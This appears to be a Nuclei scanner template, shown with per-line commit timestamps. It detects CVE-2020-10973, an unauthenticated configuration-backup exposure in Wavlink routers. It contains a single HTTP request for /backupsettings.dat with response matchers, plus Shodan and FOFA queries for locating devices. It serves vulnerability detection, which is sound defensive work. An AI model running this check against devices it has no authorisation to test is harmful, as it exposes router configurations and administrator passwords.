2022-08-14 11:56:35 +00:00
id : CVE-2020-10973
info :
2023-02-01 16:30:50 +00:00
name : WAVLINK - Access Control
2022-08-14 11:56:35 +00:00
author : arafatansari
2022-08-14 12:39:55 +00:00
severity : high
2022-08-14 11:56:35 +00:00
description : |
2023-02-01 18:23:46 +00:00
Wavlink WN530HG4, WN531G3, WN533A8, and WN551K are susceptible to improper access control via /cgi-bin/ExportAllSettings.sh, where a crafted POST request returns the current configuration of the device, including the administrator password. No authentication is required. The attacker must perform a decryption step, but all decryption information is readily available.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected device.
2023-09-06 12:22:36 +00:00
remediation : |
Apply the latest firmware update provided by the vendor to fix the access control issue.
2022-08-14 11:56:35 +00:00
reference :
2022-08-20 09:59:46 +00:00
- https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973
2022-08-23 09:22:00 +00:00
- https://github.com/sudo-jtcsec/Nyra
2023-02-01 16:05:22 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-10973
2023-04-12 10:55:48 +00:00
- https://github.com/Roni-Carta/nyra
2023-07-11 19:49:27 +00:00
- https://github.com/sudo-jtcsec/CVE/blob/master/CVE-2020-10973-affected_devices
2022-08-14 12:37:55 +00:00
classification :
2022-08-23 09:22:00 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score : 7.5
2022-08-14 12:37:55 +00:00
cve-id : CVE-2020-10973
2022-08-23 09:22:00 +00:00
cwe-id : CWE-306
2024-03-23 09:28:19 +00:00
epss-score : 0.02524
2024-06-07 10:04:29 +00:00
epss-percentile : 0.90149
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:o:wavlink:wn530hg4_firmware:m30hg4.v5030.191116:*:*:*:*:*:*:*
2022-08-14 11:56:35 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : wavlink
product : wn530hg4_firmware
2024-06-07 10:04:29 +00:00
shodan-query :
- http.html:"Wavlink"
- http.html:"wavlink"
2024-05-31 19:23:20 +00:00
fofa-query : body="wavlink"
2022-08-14 12:37:55 +00:00
tags : cve,cve2020,exposure,wavlink
2022-08-14 11:56:35 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-14 11:56:35 +00:00
- raw :
- |
2022-08-20 09:59:46 +00:00
GET /backupsettings.dat HTTP/1.1
2022-08-14 11:56:35 +00:00
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
2022-08-14 12:23:26 +00:00
part : body
2022-08-14 11:56:35 +00:00
words :
2022-08-20 09:59:46 +00:00
- 'Salted__'
- type : word
part : header
words :
- application/octet-stream
2022-08-14 12:23:26 +00:00
- type : status
status :
- 200
2024-06-08 16:02:17 +00:00
# digest: 4b0a00483046022100dea52dfa4843e4127c3a69e69b04f59de83a94b14134d589172366662c011b200221008fd50c26a4daabf85737b644ba836b227c9df3fb1b9d909708ae4f9bf0b9a476:922c64590222798bb761d5b6d8e72950